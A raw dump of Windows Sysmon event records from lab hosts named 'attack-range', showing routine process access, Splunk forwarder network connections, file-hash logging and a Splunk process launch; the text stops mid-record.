10:59:52.097{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000293881Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:51.539{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53839-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000293880Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:53.333{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293879Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:53.333{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293878Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:53.333{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293877Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:53.296{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0E8BD36D13EC28F66A86A39A85C36A5,SHA256=FF16C1CC083C248E8ADB6531C825BDD9F59FCC73670BE2D24C248ED6AF962CCA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218288Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:51.701{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51448-false10.0.1.12-8000- 23542300x8000000000000000218287Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:53.221{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13EF72CC73F1E1A5F6C2BE87856E6866,SHA256=8A691D50520DF7FBE2D0A29C227C5E66B0E0EF5EC7575634BBEEA02D2C971D52,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000293876Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:53.034{C8EA50B7-138D-6216-7506-000000003802}1912C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000293882Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:54.318{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C680CF41C3AAA6AE213E538C840AFE1,SHA256=6BB4FF0E7CE1BB58A23800C8BE88A5152FAF321E2E8923CB7122F3D6DC13ED5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218289Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:54.237{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D47CBA6FD34F63080C22CD56FCAE8F9,SHA256=26C002894D9E0510FF8876C201F3A6A0B87651E53DAE15F1ED99EFC4BCE147F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293883Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:55.349{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5542380EF34F9445E8264B47B2695DD8,SHA256=43E24B783EDC4E143DEC429A31399EE0282867967597DF659EA7C9B5E3434ADE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218290Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:55.252{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC136C146CEBB6B78BBDAD1EF3433979,SHA256=1D73CFC49984377862EC173C77573622FFEE2F245D169550F13671E6E56B732E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293884Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:56.353{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A28CFB407415072893E728B4E1474B4,SHA256=3E8C5301FE0C07BBBA63EC800594E09CCADE7F86A437BAFE2CC98B5AF9925E4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218291Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:56.315{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44E608799B442888CB973BF216E01C45,SHA256=A98B036F11F2EA1A536B3A8881C7CB931AF64C2B77F98925970D042B166AAFB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218292Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:57.534{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80ED8C91978DEE73B753553EA471A21D,SHA256=ADA7067535EB99795A6CFC32A1BE453152010FEE5F867D80E2D4F7B3DD6595D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293888Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:57.419{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E24F650EF639A2B4923052523847BEF,SHA256=C1EA68D8DBDD48972A48538C7CD2ABD25B90993E3EFE412E3345FC8AC780DFC7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293887Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:57.100{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293886Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:57.100{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293885Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:57.100{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000218293Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:58.612{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C4D932D03CCE37FEBD95F11D7CE1E39,SHA256=B2C60AED63EF40C9D6D9BA6A8E081A45BB286CEBCB5505396D56775582164FC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293889Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:58.437{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA0210E7F7F43C774B963299C9699897,SHA256=FEBE858D2C8FBE34EA2479B0A37F713E4F6FD8031569C26841F11B0BD910FC3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218294Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:59.690{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77FE4AB2F6D51D5D8253CC34BB28BA75,SHA256=A50F2AE2101CFD845C22D8F75ACC4C360CD736A42EDA8F42E6339A5A01004234,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293891Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:56.593{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53841-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000293890Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:59.452{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF1937AD8055A2C4853ABBC255166698,SHA256=E04AE5DADCDDC167C95FFA6B65BFB7307FC376D46EFF3DEABFA94C1F34E02ADA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218296Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:00.721{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5015E7A67359073983730A95092E4F59,SHA256=4B1B0D58B08F7C865D0C7E5FE2E87A9A1A2C7FE5C6DAF5DDE3C8DF0344B7C79B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293892Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:00.465{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C05B8D3A8D878D12FD975077D4D71278,SHA256=B87C178C47081D292C58C3E0D369EBE9914F479DFE7E1F19F0277784CA8E3B09,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218295Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:57.623{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51449-false10.0.1.12-8000- 23542300x8000000000000000218297Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:01.940{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B6D230145310FF07D44D3004C66ED52,SHA256=C8B055558A14CFB7445A115765FC3C8EEDBF8DA2F86205E6FC32350D2EF19148,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293901Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:01.505{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-13B1-6216-7706-000000003802}6916C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293900Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:01.483{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2430D3DB6CDD5D2F9B91FE963E95AFBA,SHA256=590CC395E1C2204D294106F6B77B0528361AAEE55F1D7E0B639934BBEFE26017,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293899Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:01.468{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293898Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:01.468{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293897Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:01.468{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293896Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:01.468{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293895Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:01.468{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-13B1-6216-7706-000000003802}6916C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293894Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:01.468{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-13B1-6216-7706-000000003802}6916C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000293893Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:01.469{C8EA50B7-13B1-6216-7706-000000003802}6916C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000293911Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:02.510{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 